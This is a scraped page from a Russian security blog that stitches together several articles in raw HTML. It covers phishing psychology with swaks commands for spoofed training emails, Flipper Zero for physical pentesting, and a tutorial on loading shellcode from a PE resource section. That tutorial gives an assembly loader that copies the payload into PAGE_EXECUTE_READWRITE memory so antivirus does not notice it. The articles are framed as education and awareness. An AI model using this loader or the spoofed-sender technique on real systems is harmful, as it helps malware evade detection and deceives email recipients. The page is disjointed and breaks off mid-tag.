Разбор пакера UPX: структура PE-файлов, точка входа (OEP), импорт, скрамблеры и ручная распаковка с примерами.

Мощь и беспомощность пакера UPX

Разбираем, как работает фишинг и приёмы социальной инженерии: психологические триггеры, примеры атак и защита сотрудников на практике.

<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <title>Фишинг и социальная инженерия: техники атак и защита</title>
    <meta name="description"
          content="Разбираем, как работает фишинг и приёмы социальной инженерии: психологические триггеры, примеры атак и защита сотрудников на практике.">
    <meta name="keywords"
          content="фишинг, социальная инженерия, психологические триггеры фишинга, примеры фишинговых атак, защита от фишинга, phishing attacks, pretexting, обучение сотрудников безопасности, swaks phishing test, кибербезопасность">
</head>
<body>
<blockquote>
    <p>Данная статья подготовлена исключительно в образовательных и информационных целях в рамках темы кибербезопасности
        и
        повышения осведомленности. Вся представленная информация предназначена для законного применения</p>
</blockquote>
<div data-toc="Введение" id="introduction"></div>
<h3>Введение</h3>
<p>Почему одни люди с лёгкостью получают доступ к закрытой информации, а другим безоговорочно доверяют пароли? Это не
    магия, а наука под названием социальная инженерия — искусство управления человеческим поведением. К сожалению, этот
    вектор атаки часто остаётся в тени, и многие его грубо недооценивают, сосредотачиваясь на технологических средствах
    защиты, забывая о самом уязвимом звене — человеке. Возникает закономерный вопрос: «Как такое простое мошенничество
    может быть таким эффективным?». </p>
<p>Социальная инженерия — это совокупность техник, где главным «инструментом» является человеческое поведение, а не
    уязвимость в коде. Технические средства (файерволы, антивирусы, фильтры) важны, но именно человек чаще всего
    становится проводником атаки: от предоставления пароля до клика по вредоносной ссылке.</p>
<div data-toc="Психологические триггеры: кнопки, на которые нажимают мошенники" id="psychological-triggers"></div>
<h3>Психологические триггеры: кнопки, на которые нажимают мошенники</h3>
<p>Прежде чем перейти к техникам, важно понять почему они работают. Все атаки используют фундаментальные принципы
    человеческой психологии. Похожие приёмы используются и в реверс‑инжиниринге — см. статью <a
            href="https://hackerlab.pro/blog/skripty-i-funktsii-v-x64dbg" target="_blank" rel="noopener">Скрипты и
        функции в x64dbg</a>.</p>
<div data-toc="Срочность / страх потери" id="urgency-fear-of-loss"></div>
<h3>Срочность / страх потери</h3>
<p>Как используется: сообщения создают искусственную нехватку времени — «подтвердите в течение часа», «срок истекает
    сегодня».</p>
<p>Почему работает: люди склонны принимать рискованные решения, чтобы избежать потери, и действуют импульсивно при
    дефиците времени.</p>
<p>Типичные фразы:</p>
<ul>
    <li>«Ваш аккаунт будет заблокирован через 24 часа»</li>
    <li>«Не упустите вознаграждение — акция заканчивается сегодня»</li>
</ul>
<p>Признаки фишинга: нелогичное давление времени, отсутствие деталей, ссылка вместо инструкции посетить официальный
    портал.</p>
<div data-toc="Авторитет" id="authority"></div>
<h3>Авторитет</h3>
<p>Как используется: атаки от имени руководителей, IT, HR, банка, налоговой.</p>
<p>Почему работает: люди обычно подчиняются фигурам, воспринимаемым как авторитеты </p>
<p>Типичные фразы:</p>
<ul>
    <li>«От: CEO — Прошу срочно выполнить платеж»</li>
    <li>«ИТ-служба просит обновить данные»</li>
</ul>
<p>Признаки фишинга: несоответствие email-адреса, отсутствие подписи или контактных данных, необычное поведение (запрос
    вне норм процесса).</p>
<div data-toc="Социальное доказательство" id="social-proof"></div>
<h3>Социальное доказательство</h3>
<p>Как используется: «75% ваших коллег уже заполнили форму», «коллеги подтвердили» — создают давление
    соответствовать.</p>
<p>Почему работает: люди ориентируются на поведение группы, предполагая, что большинство знает лучше.</p>
<p>Типичные фразы:</p>
<ul>
    <li>«Все в отделе подтвердили»</li>
    <li>«Ваш коллега Иван уже прошёл»</li>
</ul>
<p>Признаки фишинга: ссылки на несуществующие внутренние ресурсы, массовые сообщения без персонализации, попытки вовлечь
    через внутренние чаты.</p>
<div data-toc="Взаимность" id="reciprocity"></div>
<h3>Взаимность</h3>
<p>Как используется: мошенник делает «услугу» (подарок, бонус) и ожидает ответной реакции — пользователь готов отплатить
    информацией или действием.</p>
<p>Почему работает: норма взаимности — люди чувствуют обязательство отвечать добром за добро.</p>
<p>Типичные фразы:</p>
<ul>
    <li>«Бесплатный подарок — скачайте»</li>
    <li>«Мы подготовили бонус только для Вас»</li>
</ul>
<p>Признаки: неожиданные вложения/ссылки, просьбы «в знак благодарности» предоставить данные.</p>
<div data-toc="Последовательность" id="consistency"></div>
<h3>Последовательность</h3>
<p>Как используется: сначала мелкая просьба (подтвердите почту), затем — большая (сдать паспортные данные).</p>
<p>Почему работает: люди стремятся быть последовательными со своими предыдущими действиями.</p>
<p>Типичные фразы:</p>
<ul>
    <li>«Просто подтвердите этот маленький шаг…»</li>
</ul>
<p>Признаки: серия писем с непримечательными требованиями, которые эскалируются.</p>
<div data-toc="Базовые техники: Узнай врага в лицо" id="basic-techniques"></div>
<h3>Базовые техники: Узнай врага в лицо</h3>
<div data-toc="1. Фишинг: Массовая «ловля» доверия" id="phishing"></div>
<h3>1. Фишинг: Массовая «ловля» доверия</h3>
<p>Что это? Массовая рассылка поддельных писем или сообщений, маскирующихся под легитимные источники (банк, соцсеть,
    коллега). Прямая атака на триггеры срочности и страха.</p>
<p>Пример письма (с разбором триггеров):</p>
<img src="https://hackerlab.pro/game_api/articles/static/51483eff-6774-4897-a663-81d206876a9a/1.jpg" alt="1">

<div data-toc="2. Претекстинг (Pretexting): Искусство легенды" id="pretexting"></div>
<h3>2. Претекстинг (Pretexting): Искусство легенды</h3>
<p>Что это? Более продвинутая и целевая техника. Злоумышленник заранее придумывает правдоподобный предлог (легенду) и
    вживается в роль, чтобы выудить информацию. Использует авторитет и последовательность. Подобные элементы социальной
    инженерии нередко встречаются в заданиях на соревнованиях. Подробнее читайте в <a
            href="https://hackerlab.pro/blog/ctf-zadaniya-2025-ot-idei-do-deploja-polnyj-gajd" target="_blank"
            rel="noopener">CTF‑задания 2025: от идеи до деплоя</a>.</p>
<img src="https://hackerlab.pro/game_api/articles/static/51483eff-6774-4897-a663-81d206876a9a/2.jpg" alt="2">
<div data-toc="Знакомство с Swaks для тестовых рассылок" id="swaks-intro"></div>
<h3>Знакомство с Swaks для тестовых рассылок</h3>
<p>Swaks (Swiss Army Knife for SMTP) — это «швейцарский нож» для тестирования почтовых серверов. Он позволяет вручную
    отправлять письма через SMTP, подставлять заголовки, проверять работу TLS/аутентификации и даже эмулировать учебные
    фишинговые письма в безопасной среде.</p>
<p>Установить программу можно буквально одной командой. Например, в системах на базе Ubuntu достаточно выполнить sudo
    apt install swaks, а пользователи macOS могут воспользоваться Homebrew: brew install swaks. После установки утилита
    готова к работе и не требует сложной настройки.</p>
<img src="https://hackerlab.pro/game_api/articles/static/51483eff-6774-4897-a663-81d206876a9a/3.jpg" alt="3">
<pre><code>brew install swaks
или
apt install swaks</code></pre>
<p>Главное удобство Swaks заключается в том, что письмо можно «собрать» прямо из командной строки. Мы указываем
    получателя, подставляем адрес отправителя, формируем тему и тело письма, а затем отправляем его через выбранный
    SMTP-сервер. Например, простая команда может выглядеть так:</p>
<img src="https://hackerlab.pro/game_api/articles/static/51483eff-6774-4897-a663-81d206876a9a/4.jpg" alt="4">
<pre><code>swaks \
  --to test.employee@company.local \
  --from &quot;IT Support &lt;itsupport@company.local&gt;&quot; \
  --server smtp.company.local \
  --header &quot;Subject: [Учебно] Проверка доставки&quot; \
  --body &quot;Это учебное письмо для проверки работы почтового шлюза.&quot;</code></pre>
<p>После её выполнения Swaks не просто отправит сообщение, но и выведет пошаговый лог диалога с сервером. Такой отчёт
    особенно полезен для отладки: видно, как сервер принимает команду MAIL FROM, реагирует на RCPT TO, обрабатывает
    заголовки и тело письма. Кроме текста, в письме можно использовать заранее подготовленные шаблоны или даже
    прикреплять вложения. Для этого достаточно передать в команду параметры --body (указав путь к текстовому файлу) и
    --attach (путь к приложению). Такой подход позволяет проводить более реалистичные тренировки: например, имитировать
    рассылку с «важным документом» и затем обсуждать с сотрудниками, почему нельзя открывать неизвестные вложения.</p>
<img src="https://hackerlab.pro/game_api/articles/static/51483eff-6774-4897-a663-81d206876a9a/5.jpg" alt="5">
<pre><code>swaks \
  --to staff@company.local \
  --from &quot;security@company.local&quot; \
  --server smtp.company.local \
  --header &quot;Subject: [Учебно] Важная информация&quot; \
  --body ./templates/warning.txt \
  --attach ./attachments/safe_guide.pdf</code></pre>
<div data-toc="Заключение" id="conclusion"></div>
<h3>Заключение</h3>
<p>Фишинг и другие приёмы социальной инженерии остаются одними из самых опасных угроз для организаций любого масштаба.
    Главная причина их эффективности проста: они эксплуатируют человеческую психологию, а не технические уязвимости.
    Даже самые современные системы защиты не смогут гарантировать безопасность, если сотрудник поддастся на уловку и сам
    откроет злоумышленнику дверь.</p>
<p>Поэтому борьба с фишингом невозможна только силами технологий. Антивирусы, фильтры и почтовые шлюзы снижают
    количество опасных писем, но окончательное решение всегда принимает человек. Именно поэтому ключевым элементом
    защиты становится культура безопасности: регулярное обучение, практика на реальных примерах, тренировки в виде
    учебных рассылок и готовность сотрудников задавать вопросы, а не действовать импульсивно.</p>
</body>
</html>

Фишинг и социальная инженерия: психология атак и методы защиты

Разбираем, как выглядят и создаются окна кейгенов (KeyGen): упаковка PECompact, TLS, поиск OEP, ловля DialogBoxParam, использование GDI32 для интерфейса и демо-код. Материал — для обучения.

Создание окон KeyGen: анализ упаковки, поиск OEP и интерфейс на GDI32 (демо-код)

Как ускорить реверс с помощью скриптов в x64dbg. Примеры сценариев и функций: работа со структурами, VirtualAlloc, callback-и и сохранение дампов памяти. Полный гайд для начинающих реверсеров.

Скрипты и функции в x64dbg: автоматизация реверса и примеры

Как использовать ChatGPT и Claude для эксплойтов, автоматизировать пентесты и защищаться от ML-атак. Практические кейсы и готовые инструменты.

AI в кибербезопасности 2025: практическое руководство пентестера

Создание CTF-заданий с нуля: Docker изоляция, динамические флаги, тестирование уязвимостей. Практическое руководство с примерами кода для всех категорий.

CTF-задания 2025: от идеи до деплоя | Полный гайд

Flipper Zero позволяет тестировать RFID, USB, NFC и Sub-GHz устройства. Узнай, как использовать его в физическом пентесте: примеры, техники, утилиты.

<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description"
          content="Flipper Zero позволяет тестировать RFID, USB, NFC и Sub-GHz устройства. Узнай, как использовать его в физическом пентесте: примеры, техники, утилиты.">
    <meta name="keywords"
          content="модель OSI, основы сетей, информационная безопасность, сети для новичков, пентест, сетевые протоколы, TCP/IP, ARP, уровни OSI, уязвимости сети">
    <title>Flipper Zero: универсальный гаджет для физического пентеста</title>
</head>
<body>

<blockquote>⚠️ Важно: Информация в этой статье предоставляется исключительно в образовательных целях. Использование
    описанных техник и устройств без согласия владельца оборудования и вне рамок легального тестирования на
    проникновение является нарушением закона. Автор и платформа не несут ответственности за противоправное применение
    изложенного материала.
</blockquote>

<div data-toc="Введение" id="introduction"></div>
<h3>Введение</h3>

<p>В сфере информационной безопасности традиционно акцент делается на программные векторы атак: уязвимости в
    приложениях, ошибки в настройках серверов, слабые пароли и т.д. Однако в реальном мире компрометация часто
    начинается с физического доступа: к компьютеру, серверной, RFID-замку или даже беспроводному пульту от шлагбаума.
    Поэтому физические устройства в пентесте — это не экзотика, а практический инструмент, позволяющий оценить реальный
    уровень устойчивости инфраструктуры.</p>

<p>В арсенале современного пентестера всё чаще появляются такие гаджеты, как Flipper Zero, Rubber Ducky, Proxmark3,
    Raspberry Pi Zero и другие. Они позволяют протестировать не только сетевую защиту, но и:</p>

<ul>
    <li>работу систем контроля и управления доступом (СКУД);</li>
    <li>безопасность USB-портов;</li>
    <li>защиту от внешних подключений;</li>
    <li>уязвимости в протоколах беспроводной связи.</li>
</ul>

<div data-toc="Для чего используются физические устройства при проведении работ по тестированию на проникновение"
     id="hardware-pentest-tools"></div>
<h3>Для чего используются физические устройства при проведении работ по тестированию на проникновение</h3>

<p>Вот основные сценарии, в которых физические устройства могут быть полезны во время тестирования на проникновение:</p>

<p><b>1. Атаки на системы контроля доступа (СКУД)</b></p>
<p>RFID/NFC карты, которыми сотрудники открывают двери, часто не защищены криптографически. Устройства вроде Flipper
    Zero или Proxmark3 позволяют:</p>

<ul>
    <li>считывать карты на расстоянии до 5 см;</li>
    <li>клонировать и эмулировать идентификаторы;</li>
    <li>осуществлять перебор ID (bruteforce);</li>
    <li>прослушивать взаимодействие между считывателем и картой.</li>
</ul>

<p><b>2. USB-атаки и физическое внедрение</b></p>

<p>Устройства, эмулирующие клавиатуру (HID-атаки), могут подключаться к открытому USB-порту и мгновенно выполнять
    команды от имени пользователя. Самые популярные инструменты:</p>

<ul>
    <li>Rubber Ducky — флешка, запускающая запрограммированные скрипты;</li>
    <li>Flipper Zero (BadUSB) — превращается в клавиатуру, вводит команды, открывает терминал и скачивает полезную
        нагрузку;
    </li>
    <li>Digispark — минималистичный вариант на базе ATtiny85, тоже выполняет скрипты.</li>
</ul>

<p><b>3. Беспроводные атаки</b></p>

<p>Многие компании используют брелоки, пульты, датчики, камеры и другие устройства на Sub-GHz частотах (315/433/868/915
    MHz). Уязвимые системы:</p>

<ul>
    <li>могут не использовать шифрование;</li>
    <li>подвержены воспроизведению записанных сигналов (replay-атаки);</li>
    <li>в ряде случаев реагируют даже на слегка измененный сигнал.</li>
</ul>

<p>Flipper Zero и Yard Stick One позволяют сканировать, записывать и воспроизводить радиосигналы — от открытия ворот до
    управления беспроводными розетками.</p>

<p><b>4. Инфракрасные атаки</b></p>

<p>ИК-порты до сих пор применяются в кондиционерах, телевизорах, проекторах и прочих устройствах. Flipper Zero может
    заменить универсальный пульт и управлять такими устройствами, например:</p>

<ul>
    <li>включать проекционное оборудование;</li>
    <li>менять настройки на мониторах;</li>
    <li>переключать презентации (что можно использовать при социальной инженерии).</li>
</ul>

<p><b>5. Инжиниринг на низком уровне (GPIO, UART, JTAG)</b></p>

<p>Для оценки защищённости IoT-устройств, роутеров и микроконтроллеров применяются пины отладки (GPIO), интерфейсы UART,
    JTAG. Через них можно:</p>

<ul>
    <li>получить shell-доступ;</li>
    <li>сбросить пароли;</li>
    <li>извлечь прошивку;</li>
    <li>обойти аутентификацию.</li>
</ul>

<p>Flipper Zero, Raspberry Pi, Bus Pirate и аналогичные устройства позволяют подключаться к таким интерфейсам и
    взаимодействовать с железом напрямую.</p>

<div data-toc="Flipper Zero" id="flipper-zero"></div>
<h3>Flipper Zero</h3>

<p>Flipper Zero — это многофункциональное устройство, которое совмещает в себе функции сразу нескольких популярных
    гаджетов. Оно выполнено в компактном корпусе, имеет дисплей и кнопки управления, а также модульную архитектуру.
    Поддерживается официально и сообществом, работает “из коробки”, но может быть расширено пользовательскими плагинами
    и прошивками.</p>

<p>Ключевые функции:</p>

<ul>
    <li>RFID (125kHz): чтение, запись, клонирование карт EM-Marine, HID Prox и др.;</li>
    <li>NFC (13.56 MHz): работа с картами Mifare, ePass, банковскими метками;</li>
    <li>Sub-GHz: управление радиоустройствами, взлом шлагбаумов, гаражных ворот, сигнализаций;</li>
    <li>IR: универсальный пульт, управление бытовой техникой;</li>
    <li>BadUSB: выполнение HID-атак;</li>
    <li>Bluetooth LE: взаимодействие с приложениями, BLE-спам и атаки;</li>
    <li>GPIO/UART: подключение к микроконтроллерам, анализ протоколов.</li>
</ul>

<div data-toc="Самые популярные приложения для Flipper Zero из официального магазина приложений"
     id="popular-apps"></div>
<h3>Самые популярные приложения для Flipper Zero из официального магазина приложений</h3>

<p><b>1. iButton Fuzzer</b></p>

<p>iButton Fuzzer — это утилита для Flipper Zero, предназначенная для фаззинга устройств, работающих с iButton-ключами
    (протокол Dallas 1-Wire). Приложение отправляет к считывателю случайно сгенерированные 8-байтные идентификаторы
    (ID), имитируя подключение iButton-устройств.</p>

<p>Основные возможности:</p>

<ul>
    <li>Генерация и отправка случайных iButton ID;</li>
    <li>Поддержка ручного или автоматического перебора;</li>
    <li>Логирование срабатываний, если считыватель реагирует.</li>
</ul>

<p>Применение:</p>

<ul>
    <li>Проверка стойкости систем доступа, основанных на iButton (электронные ключи Touch Memory);</li>
    <li>Попытка подбора, действующего ID при слабой реализации контроля;</li>
    <li>Тестирование на уязвимость к перебору или некорректной обработке данных</li>
</ul>

<img src="https://hackerlab.pro/game_api/articles/static/49e71f0e-b334-4bea-ad88-25d610de5c08/ibutton_fuzzer.png"
     alt="iButton Fuzzer">

<p><b>2. RFID Fuzzer</b></p>

<p>RFID Fuzzer — это приложение для Flipper Zero, предназначенное для фаззинга (массовой отправки случайных или
    сгенерированных RFID-идентификаторов) в диапазоне 125 кГц. Оно позволяет протестировать реакцию RFID-считывателей на
    непредсказуемые или некорректные UID.</p>

<p>Зачем используется:</p>

<ul>
    <li>Проверка устойчивости системы контроля доступа к произвольным идентификаторам;</li>
    <li>Поиск багов или некорректной обработки UID на стороне считывателя;</li>
    <li>Возможность случайно подобрать рабочий идентификатор на незащищённых системах.</li>
</ul>

<img src="https://hackerlab.pro/game_api/articles/static/49e71f0e-b334-4bea-ad88-25d610de5c08/rfid_fuzzer.png"
     alt="RFID Fuzzer">

<p><b>3. PC Monitor</b></p>

<p>PC Monitor — это приложение для Flipper Zero, позволяющее отслеживать события включения и выключения компьютеров
    через питание USB-порта. Оно работает как детектор активности: если компьютер подает питание на USB, Flipper это
    фиксирует и отображает в журнале.</p>

<p>Основные функции:</p>

<ul>
    <li>Определение момента включения и выключения ПК;</li>
    <li>Фиксация времени подачи и снятия питания;</li>
    <li>Возможность использовать Flipper как “USB-датчик активности”, например, для наблюдения за состоянием серверов,
        рабочих станций или чужого оборудования.
    </li>
</ul>

<p>Применение:</p>

<ul>
    <li>Пассивный мониторинг компьютеров без установки софта;</li>
    <li>Информативное логирование активности машин;</li>
    <li>Используется как элемент социальной инженерии или физического аудита (например, проверка, когда сотрудник
        включил рабочее устройство).
    </li>
</ul>

<img src="https://hackerlab.pro/game_api/articles/static/49e71f0e-b334-4bea-ad88-25d610de5c08/pc_monitor.png"
     alt="PC Monitor">

<p><b>4. Mifare Fuzzer</b></p>

<p>Mifare Fuzzer — это приложение для Flipper Zero, предназначенное для фаззинга MIFARE-карт (13.56 MHz, ISO14443-A).
    Оно позволяет отправлять большое количество случайных или сгенерированных запросов к NFC-считывателю, чтобы
    протестировать его реакцию на нестандартные или поврежденные данные.</p>

<p>Основные возможности:</p>

<ul>
    <li>Генерация случайных UID и команд;</li>
    <li>Атака на считыватель с целью выявления уязвимостей;</li>
    <li>Помогает проверить, насколько корректно устройство обрабатывает некорректные или неизвестные данные.</li>
</ul>

<p>Применение:</p>

<ul>
    <li>Аудит систем доступа на базе MIFARE (например, MIFARE Classic, Ultralight и др.);</li>
    <li>Проверка устойчивости NFC-инфраструктуры к фаззинг-атакам;</li>
    <li>Исследования уязвимостей в проприетарных протоколах и прошивках считывателей.</li>
</ul>

<img src="https://hackerlab.pro/game_api/articles/static/49e71f0e-b334-4bea-ad88-25d610de5c08/mifare_fuzzer.png"
     alt="Mifare Fuzzer">

<p><b>5. Eye Saver</b></p>

<p>Eye Saver — это приложение для Flipper Zero, созданное для реализации правила 20-20-20, которое используется для
    защиты глаз при длительной работе за экраном. Согласно этому принципу:</p>

<p>Каждые 20 минут нужно смотреть на объект на расстоянии 20 футов (примерно 6 метров) в течение 20 секунд.</p>

<p>Что делает Eye Saver:</p>

<ul>
    <li>Запускает таймер, отсчитывающий 20-минутные интервалы;</li>
    <li>По истечении времени — подаёт сигнал (звуковой или визуальный) с напоминанием сделать паузу;</li>
    <li>Может отображать анимации или текст с рекомендацией отвести взгляд и расслабить зрение.</li>
</ul>

<img src="https://hackerlab.pro/game_api/articles/static/49e71f0e-b334-4bea-ad88-25d610de5c08/eye_saver.png"
     alt="Eye Saver">

<hr>
<blockquote>
    <p>
        <b>Читайте также:</b>
        <br>
        <a href="https://hackerlab.pro/blog/pervye-shagi-v-veb-penteste">Первые шаги в веб-пентесте</a>
        <br>
        <a href="https://hackerlab.pro/blog/osnovy-setey-dlya-nachinayushchih-v-ib">Основы сетей</a>
        <br>
        <a href="https://hackerlab.pro/blog/top-10-instrumentov-dlya-nachinayushchego-hakera">Топ инструментов</a>
        <br>
        <a href="https://hackerlab.pro/blog/pe-shellcode-rsrc-vulnerability">Шелл-код в ресурсах PE</a>
    </p>
</blockquote>
<hr>

<div data-toc="Заключение" id="conclusion"></div>
<h3>Заключение</h3>

<p>Физические устройства дают пентестеру совершенно новый уровень возможностей. Они позволяют не просто “взламывать из
    браузера”, а выходить в физическое пространство: подслушивать радиоэфир, читать карты доступа, взаимодействовать с
    ИК-датчиками и USB-портами.</p>

<p>Flipper Zero — отличный пример многофункционального и компактного устройства, которое может заменить сразу несколько
    инструментов. Благодаря открытой архитектуре, он быстро развивается и уже занял своё место в арсенале многих
    специалистов.</p>

<p>Но не стоит забывать — использование таких устройств вне рамок легального пентеста может нарушать закон. Поэтому все
    тесты, особенно с физическим вмешательством, должны проводиться только при наличии официального разрешения и
    согласия заказчика.</p>

</body>
</html>


Flipper Zero: универсальный гаджет для физического пентеста

Узнайте, как через секцию ресурсов PE-файла можно скрытно загружать и запускать шелл-код. Подробный разбор механизмов и примеры на WinAPI и ассемблере.

<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description"
          content="Узнайте, как злоумышленники используют секцию ресурсов PE-файла для внедрения и исполнения шелл-кодов. Анализ механизмов, WinAPI-функций и ошибок в системных библиотеках.">
    <meta name="keywords"
          content="PE-файл, секция ресурсов, .rsrc, уязвимости, шелл-код, WinAPI, загрузка ресурсов, VirtualAlloc, RCDATA, malware, reverse engineering">
    <title>Скрытые угрозы .rsrc: шелл-коды в секции ресурсов PE-файла</title>
</head>
<body>

<div data-toc="Введение" id="introduction"></div>
<h3>Введение</h3>

<p>Секция .rsrc может таить в себе весьма коварные вещи, и в данном обзоре мы приоткроем этот "ящик Пандоры".</p>

<div data-toc="Общие сведения о ресурсах" id="general-information"></div>
<h3>Общие сведения о ресурсах</h3>

<p>Разбираясь с секцией ресурсов приходит осознание того, что «майки» будто специально предоставили нам легальное средство вызова шеллов из исполняемых файлов РЕ. Понятное дело в корне инженеры преследовали совсем иную цель, но в очередной раз получилось как всегда. А всё потому, что в погоне за прибылью Microsoft забыла о простой истине: «Чем проще устройство, тем стабильнее оно работает». С форматом-же РЕ файлов дела обстоят прямо противоположно. Код системного загрузчика образов «Image Loader» настольно раздут, что в нём можно запросто разместить слона.</p>

<p>Начнём с того, что имя любой секции не несет никакого метафизического смысла, и было введено исключительно из эстетических соображений. Поскольку системный загрузчик его игнорирует, мы можем пронумерировать свои секции хоть от 1 до N, и файл прекрассно отработает в памяти. Это потому, что лоадер ищет секции строго в каталоге «IMAGE_DATA_DIRECTORY» РЕ-заголовка, где лежат RVA-указатели (от ImageBase) на все из них. От сюда следует, что если мы хотим найти какую-нибудь секцию внутри жертвы, то ни в коем случае не должны делать ставку на стандартные имена, а искать только через каталог. Каждая запись в этом каталоге имеет размер 8 байт (4 для адреса + 4 под её размер). Всего имеется 16 таких записей, а секция-ресурсов всегда лежит под номером три – это представлено на скрине ниже:</p>

<img src="https://hackerlab.pro/game_api/articles/static/c8cb4c67-5f72-4164-98a6-b2bd8ed3f5e6/oleaut32.png" alt="oleaut32.dll">

<p>Зато некоторые вирусы/протекторы/упаковщики распознают личные секции только по ник-нэйму, и всякое искажение имени валит их наповал. Более того, даже прогеры из Microsoft допускают эту грубую ошибку в своих системных либах, например «<b>oleaut32.dll</b>» – она распознаёт секцию ресурсов файла по имени, а не по записи в «DATA_DIRECTORY». Дизассемблирование подтверждает, что она действительно содержит внутри себя текстовую строку ".rsrc" и активно её использует. </p>

<img src="https://hackerlab.pro/game_api/articles/static/c8cb4c67-5f72-4164-98a6-b2bd8ed3f5e6/oleaut32-error.png" alt="oleaut32.dll">

<p>Эта (на первый взгляд мелкая) ошибка приводит к тому, что если мы загружаем oleaut32.dll в своё приложение, то наша секция-ресурсов обязательно должна ходить под ником «RSRC», иначе в лучшем случае ресурсы могут быть проигнорированны, а в худшем софт вообще упадёт. Автора этой dll можно смело назвать идиотом, т.к. эту либу импортирует добрая половина и системных приложений, в результате чего имеем зависимость типа «снежный ком». Именно по этой причине буквально весь софт под Windows всегда оставляет оригинальное имя секции-ресурсов, чтобы случайно не нарваться на этот шип. Это касается и пакера UPX – он или вообще не трогает ресурсы, или-же оставляет их оригин.имя в своих нёдрах.</p>

<img src="https://hackerlab.pro/game_api/articles/static/c8cb4c67-5f72-4164-98a6-b2bd8ed3f5e6/smbios_v14_upx.png" alt="smbios_v14_upx.exe">

<blockquote>Если вас интересуют приёмы, позволяющие усложнить анализ и затруднить реверс, смотрите нашу статью <a href="https://hackerlab.pro/blog/kak-zashitit-parol-ot-reversa-antiotladka-xor-i-pryzhki-v-bezdnu" target="_blank">«Как защитить пароль от реверса: антиотладка, XOR и прыжки в бездну»</a></blockquote>

<div data-toc="Вызов шелл-кода из ресурсов" id="calling-shell-code"></div>
<h3>Вызов шелл-кода из ресурсов</h3>

<p>Секция ресурсов может содержать в себе следующие 20 типов данных, при этом большинство из них являются бинарными, как и сам шелл-код. Например нельзя физически отличить картинки, шрифты и анимацию от двоичного кода – в более критических случаях можно предварить шелл сигнатурой битпама *.bmp, и запускать его на исполнение не с первого байта тупо пропустив подложную сигнатуру:</p>

<pre>
RT_CURSOR         =  1    Курсор
RT_BITMAP         =  2    Растровое изображение
RT_ICON           =  3    Иконка приложения
RT_MENU           =  4    Меню приложения
RT_DIALOG         =  5    Диалоговое окно
RT_STRING         =  6    Запись в таблице строк
RT_FONTDIR        =  7    Каталог шрифтов
RT_FONT           =  8    Шрифт
RT_ACCELERATOR    =  9    Разделитель в меню
RT_RCDATA         =  10   Ресурс, определяемый приложением (RAW данные)
RT_MESSAGETABLE   =  11   Запись в таблице сообщений
RT_GROUP_CURSOR   =  12   Аппаратно-независимый курсор
RT_GROUP_ICON     =  14   Аппаратно-независимый ресурс значков
RT_VERSION        =  16   Версия приложения
RT_PLUGPLAY       =  19   Ресурс Plug & Play
RT_VXD            =  20   VxD (Virtual Device Driver, только для Win9x)
RT_ANICURSOR      =  21   Анимированный курсор
RT_ANIICON        =  22   Анимированная иконка
RT_HTML           =  23   HTML-ресурс
RT_MANIFEST       =  24   Данные манифеста приложения
</pre>

<p>Список-же функций WinAPI для работы с ресурсами вообще состоит из ~10 тушканчиков – графику мы можем загружать напрямую через <b>LoadBitmap/Icon/ImageString()</b>, а остальные нужно искать по идентификаторам внутри секции через <b>FindResource()</b> с последующим <b>LoadResource()</b>.</p>

<pre>
LoadBitmap
LoadIcon
LoadImage
LoadString

FindResource
SizeofResource
LoadResource
</pre>

<p>Тонкости программирование шелл-кодов выходит за рамки статьи, и может мы ещё вернёмся к этому вопросу, а пока рассмотрим вариант его запуска из ресурсов РЕ-файла. Проблема в том, что в атрибутах секции ресурсов нет флага «Исполняемая», и если авер обнаружит таковой, то сразу отправит файл на карантин. Поэтому наша задача найти указатель на тушку шелла через <b>Find/LoadResource()</b>, далее загрузить шелл в заранее выделенную <b>VirtualAlloc()</b> память с атрибутами <b>PAGE_EXECUTE_READWRITE</b>, и наконец стартануть его с чистой совестью. На языке ассемблера это выглядит примерно так – будем считать, что «ID_SHELL» это идентификатор ресурса, а «shell.bin» это сам шелл-кол:</p>

<pre>
.data
shRes   dd  0
shSize  dd  0
shData  dd  0
;//-----------------

.code
invoke  FindResource,  0, ID_SHELL, ’shell.bin’
mov     [shRes],eax
invoke  SizeofResource,0, eax
mov     [shSize],eax
invoke  LoadResource,  0, eax
mov     [shData],eax

invoke  VirtualAlloc,  0, eax, MEM_COMMIT, PAGE_EXECUTE_READWRITE
push    eax
invoke  WriteProcessMemory, -1, eax, [shData], [shSize], 0
pop     eax
jmp     eax
</pre>

<p>Однако есть и более изящный способ заключающийся в том, что в арсенале WinAPI имеется не только функция загрузки, но и перечисления ресурсов по их типам <b>EnumResourceTypes()</b>. То-есть мы задаём своему шеллу тип <b>RT_RCDATA=10</b> (сырые данные без формата), после чего ищем их в секции-ресурсов. Плюс такого подхода в том, что одним из параметров данной функции является указатель на обратный вызов «Callback», внутри которого мы уже тянем за шелл. Если из колбека мы вернём EAX=0, то поиск прекратиться. Как правило колбеки имеют все функции WinAPI с префиксом <b>Enum_XX()</b>.</p>

<pre>
EnumResourceLanguages
EnumResourceNames
EnumResourceTypes

BOOL EnumResourceTypesA(
  [in,opt] HMODULE     hModule,
  [in]     Callback    lpEnumFunc,
  [in]     LONG_PTR    lParam
);
</pre>

<div data-toc="Заключение" id="conclusion"></div>
<h3>Заключение</h3>

<p>Два описанных выше метода имеют один важный недостаток – это вызов API-функций, от которых хорошо-бы избавиться. Если учесть, что имеем указатель на секцию-ресурсов в записи(3) «IMAGE_DATA_DIRECTORY», то остаётся вручную пропарсить всю секцию в поисках нужного нам ресурса. Однако это анулирует только функции <b>Find/LoadResource()</b>, а выделять исполняемую память через <b>VirtualAlloc()</b> с последующим копированием туда шелла придётся по любому посредством WinAPI.</p>

<blockquote>Чтобы увидеть, как подобные методы применяются в CTF-задачах и учебных кейсах, рекомендуем прочитать <a href="https://hackerlab.pro/blog/ctf-zadaniya-2025-ot-idei-do-deploja-polnyj-gajd" target="_blank">«CTF-задания 2025: от идеи до деплоя — полный гайд»</a>.</blockquote>

</body>
</html>


Скрытые угрозы ресурсов EXE: шелл-код внутри PE-файла

Платформы для практики в кибербезопасности — обзор лучших решений

От теории к практике: топ платформ по кибербезопасности

Изучаем безопасность веб-приложений: основные протоколы, типы уязвимостей, настройка Kali и практика на CTF.

<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
